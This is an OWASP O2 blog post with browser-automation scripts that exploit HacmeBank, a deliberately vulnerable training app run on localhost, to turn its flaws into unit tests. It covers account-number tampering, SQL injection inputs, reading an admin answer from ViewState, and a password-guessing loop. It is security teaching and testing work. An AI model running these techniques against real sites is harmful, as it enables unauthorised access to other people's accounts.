OWASP O2 Platform Blog

HacmeBank – Unit Tests for Vulnerabilities

The following examples show how to create automated exploits and proofs of concept (PoCs), to be later transformed into unit tests, for HacmeBank’s vulnerabilities.

This code uses O2’s WatiN integration to create an easy ‘IE automation’ scripting environment.

Install and confirm we can login

After installing HacmeBank, run the following script, which confirms that we can log in:

// Sanity check: drive IE to the HacmeBank login page and submit the test account.
// The window is positioned at (0,500) with a 750x500 size.
// NOTE(review): "about:black" looks like a typo for about:blank; it is harmless
// here because open() navigates away immediately — confirm against the O2 ie() helper.
var browser = "about:black".ie(0,500,750,500);

browser.open("http://localhost:58348/HacmeBank_v2_Website");
// Hard-coded credentials for the local HacmeBank training app. A reusable test
// harness should load these from configuration rather than keep them in source.
browser.field("txtUserName").value("jm");
browser.field("txtPassword").value("jm789");
browser.button("Submit").click();

Vulnerability: User A is able to see User B’s account details

// Reproduces the insecure direct object reference: after logging in as one user,
// the account number embedded in the "View Transactions" URL is swapped for a
// different account number and the page is requested again. A correctly written
// server would verify that the requested account belongs to the logged-in session
// instead of trusting the identifier supplied in the query string.
var browser = "about:black".ie(0,500,750,500);

browser.open("http://localhost:58348/HacmeBank_v2_Website");

// Hard-coded training-app credentials; a real harness should read them from configuration.
browser.field("txtUserName").value("jm");
browser.field("txtPassword").value("jm789");
browser.button("Submit").click();

browser.link("My Accounts").click();
browser.link("View Transactions").click();

// The current URL presumably carries the logged-in user's own account number;
// only that number is rewritten, everything else in the URL is left intact.
var ownAccountUrl = browser.url();
var otherAccountUrl = ownAccountUrl.replace("5204320422040003","5204320422040001");
browser.open(otherAccountUrl);

// Presumably keeps the window open for 20 seconds so the result can be inspected.
browser.closeInNSeconds(20);

Vulnerability: SQL Injection in Login page

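/// <summary>
/// Reproduces the SQL-injection finding on the login page: a user name containing a
/// single quote plus trailing text is submitted as-is. The application-side fix is a
/// parameterised query for the login lookup, never string concatenation.
/// </summary>
/// <remarks>
/// Marked [Test] so the test runner discovers it like the sibling methods in this
/// fixture. There is no assertion yet: the method reproduces the request but cannot
/// fail, so to become a real regression test it must assert on the observed outcome.
/// </remarks>
[Test]
public void vulnerability_Sql_Injection_in_Login_page()
{
    setup();
    Browser.open(StartUrl);
    // flash() is presumably the O2/WatiN visual highlight; kept so the run is watchable.
    Browser.field("txtUserName").value("jv ' aaa").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();
}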

Vulnerability: SQL Injection in Accounts Details page

/// <summary>
/// Reproduces the SQL-injection finding on the account-details page: after navigating
/// to "View Transactions", the page's own URL is re-requested with a stray quote and
/// filler appended. Server-side, any identifier taken from the URL must be bound as a
/// query parameter rather than concatenated into SQL.
/// </summary>
/// <remarks>
/// No assertion yet — this reproduces the request but cannot fail; a real regression
/// test must assert on the observed outcome.
/// </remarks>
[Test]
public void vulnerability_Sql_Injection_in_Accounts_Details_page()
{
    setup();
    Browser.open(StartUrl);

    // Hard-coded training-app credentials; move to configuration in a real harness.
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").flash().click();

    // Navigate to the transactions view (its URL presumably carries the account identifier).
    Browser.link("My Accounts").flash().click();
    Browser.link("View Transactions").flash().click();

    // Re-request the same page with the malformed suffix appended to its URL.
    var transactionsUrl = Browser.url();
    Browser.open(transactionsUrl + "' AAAAA ");
}

Vulnerability: Sensitive Information Disclosure in Admin Section Login

/// <summary>
/// Reproduces the information-disclosure finding in the Admin Section login: the value
/// the form appears to expect in "_ctl3:txtResponse" is read straight out of the page's
/// ViewState and submitted. ViewState is readable by the client, so nothing that must
/// stay secret from the user belongs in it — a challenge whose answer is shipped with
/// the page protects nothing.
/// </summary>
/// <remarks>
/// No assertion yet — this reproduces the request but cannot fail.
/// </remarks>
[Test]
public void vulnerability_Sensitive_Information_Disclosure_in_Admin_Section()
{
    setup();
    Browser.open(StartUrl);

    // Hard-coded training-app credentials; move to configuration in a real harness.
    Browser.field("txtUserName").value("jv").flash();
    Browser.field("txtPassword").value("jv789").flash();
    Browser.button("Submit").click();

    Browser.link("Admin Section").flash().click();

    // Index 12 is presumably the ViewState slot holding the expected response. It is a
    // positional magic number, so re-check it against the page if the form changes.
    var expectedResponse = Browser.viewState().ViewState_Values[12];

    Browser.field("_ctl3:txtResponse").value(expectedResponse).flash();
    Browser.button("Login").flash().click();
}

Script: Fuzzing Admin password

// Demo of a password-guessing loop against the Admin Section login, driven from an IE
// instance hosted in an O2 panel (silent(true) presumably suppresses the visible window).
// Every attempt re-does the full user login, opens the Admin Section and submits one
// candidate in "_ctl3:txtResponse". Ten sequential guesses like this are exactly what an
// account-lockout or rate limit on the admin login should stop, and they show up in the
// web server logs as repeated POSTs to the same form — a useful detection signal.
panel.clear();
var container = panel.add_Panel();

var browser = container.add_IE().silent(true);
var loginUrl = "http://localhost:58915/HacmeBank_v2_Website/aspx/login.aspx";

Action<string> tryAdminPassword = (candidate) =>
{
    browser.open(loginUrl);
    browser.disableFlashing();
    // Hard-coded training-app credentials; move to configuration in a real harness.
    browser.field("txtUserName").value("jv").flash();
    browser.field("txtPassword").value("jv789").flash();
    browser.button("Submit").click();
    browser.link("Admin Section").flash().click();
    //var secret = ie.viewState().ViewState_Values[12];
    // NOTE(review): the two-argument field(name, value) form differs from the
    // field(name).value(...) chain used above — presumably an O2 overload; confirm.
    browser.field("_ctl3:txtResponse", candidate);
    browser.button("Login").click();
    //Add logic to detect admin Login
};

// Candidates "admin0" .. "admin9", tried one after another.
var attempt = 0;
while (attempt < 10)
{
    tryAdminPassword("admin" + attempt);
    attempt++;
}

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

July 27, 2011 - Posted by | HacmeBank, IE Automation, WatiN
